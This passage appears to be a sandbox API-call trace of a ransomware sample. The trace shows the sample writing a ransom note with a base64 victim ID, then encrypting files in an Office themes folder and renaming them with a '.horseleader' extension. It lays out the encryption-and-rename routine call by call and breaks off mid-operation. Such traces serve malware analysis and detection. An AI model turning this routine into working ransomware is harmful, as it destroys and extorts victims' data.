\r\ntell your unique ID\r\n") returned 1508 [0247.779] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.780] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.780] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.780] CloseHandle (hObject=0x158) returned 1 [0247.781] 
GetProcessHeap () returned 0x780000 [0247.781] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.781] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="RMNSQUE", cAlternateFileName="")) returned 1 [0247.781] lstrcmpiW (lpString1="RMNSQUE", lpString2="Windows") returned -1 [0247.781] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE") returned 67 [0247.781] lstrcmpW (lpString1="RMNSQUE", lpString2=".") returned 1 [0247.781] lstrcmpW (lpString1="RMNSQUE", lpString2="..") returned 1 [0247.781] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.781] GetProcessHeap () returned 0x780000 [0247.781] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.781] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\*") returned 69 [0247.781] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, 
ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.782] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.782] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\.") returned 69 [0247.782] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.782] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.782] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.782] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\..") returned 70 [0247.782] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.782] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.783] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1004, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.783] lstrcmpiW (lpString1="PREVIEW.GIF", 
lpString2="Windows") returned -1 [0247.783] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 79 [0247.783] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.783] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.783] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.783] lstrlenW (lpString=".testttjffg") returned 11 [0247.783] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.783] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.783] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.784] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.784] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 79 [0247.784] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.784] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=4100) returned 1 [0247.784] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1004, lpOverlapped=0x0) returned 1 [0247.787] SetFilePointerEx (in: hFile=0x1a4, 
liDistanceToMove=0xffffeffc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.787] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1004, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1004, lpOverlapped=0x0) returned 1 [0247.787] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.787] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.788] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.788] CloseHandle (hObject=0x1a4) returned 1 [0247.788] GetProcessHeap () returned 0x780000 [0247.788] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.788] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.horseleader") returned 91 [0247.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif.horseleader")) returned 1 [0247.790] GetProcessHeap () returned 0x780000 [0247.790] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 
[0247.790] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x225d7800, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6d2019f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x225d7800, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x11e37, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="RMNSQUE.ELM", cAlternateFileName="")) returned 1 [0247.790] lstrcmpiW (lpString1="RMNSQUE.ELM", lpString2="Windows") returned -1 [0247.790] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM") returned 79 [0247.790] StrStrIW (lpFirst="RMNSQUE.ELM", lpSrch=".horseleader") returned 0x0 [0247.790] lstrcmpW (lpString1="RMNSQUE.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.790] lstrcmpW (lpString1="RMNSQUE.ELM", lpString2="_uninstalling_.png") returned 1 [0247.790] lstrlenW (lpString=".testttjffg") returned 11 [0247.790] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM", lpSrch=".testttjffg") returned 0x0 [0247.790] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.790] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.791] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\rmnsque.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.791] lstrlenW 
(lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM") returned 79 [0247.791] StrStrW (lpFirst="RMNSQUE.ELM", lpSrch=".txt") returned 0x0 [0247.792] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=73271) returned 1 [0247.792] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.792] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.796] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.796] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.797] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x671b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.797] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.797] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.797] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.798] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xce37, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0247.798] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.798] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.798] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.799] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.799] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.799] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.799] CloseHandle (hObject=0x1a4) returned 1 [0247.800] GetProcessHeap () returned 0x780000 [0247.800] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.800] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM.horseleader") returned 91 [0247.800] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\rmnsque.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\rmnsque.elm.horseleader")) returned 1 [0247.810] GetProcessHeap () returned 0x780000 [0247.810] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.810] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a89bd50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x265, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="RMNSQUE.INF", cAlternateFileName="")) returned 1 [0247.810] lstrcmpiW (lpString1="RMNSQUE.INF", lpString2="Windows") returned -1 [0247.810] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF") returned 79 [0247.810] StrStrIW (lpFirst="RMNSQUE.INF", lpSrch=".horseleader") returned 0x0 [0247.810] lstrcmpW (lpString1="RMNSQUE.INF", lpString2="#Decrypt#.txt") returned 1 [0247.811] lstrcmpW (lpString1="RMNSQUE.INF", lpString2="_uninstalling_.png") returned 1 [0247.811] lstrlenW (lpString=".testttjffg") returned 11 [0247.811] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF", lpSrch=".testttjffg") returned 0x0 [0247.811] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.811] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.811] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\rmnsque.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.813] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF") returned 79 [0247.813] StrStrW (lpFirst="RMNSQUE.INF", lpSrch=".txt") returned 0x0 [0247.813] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=613) returned 1 [0247.813] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x265, lpOverlapped=0x0) returned 1 [0247.814] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffd9b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.815] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x265, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x265, lpOverlapped=0x0) returned 1 [0247.815] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.815] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.815] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.815] CloseHandle (hObject=0x1a4) returned 1 [0247.816] GetProcessHeap () returned 0x780000 [0247.816] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.816] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF.horseleader") returned 91 [0247.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\rmnsque.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\rmnsque.inf.horseleader")) returned 1 [0247.817] GetProcessHeap () returned 0x780000 [0247.817] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.817] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xbb5a, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.817] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.817] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 80 [0247.817] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.817] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.817] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.817] lstrlenW (lpString=".testttjffg") 
returned 11 [0247.817] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.818] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.818] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.818] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.818] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 80 [0247.818] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.819] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=47962) returned 1 [0247.819] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.822] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.822] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, 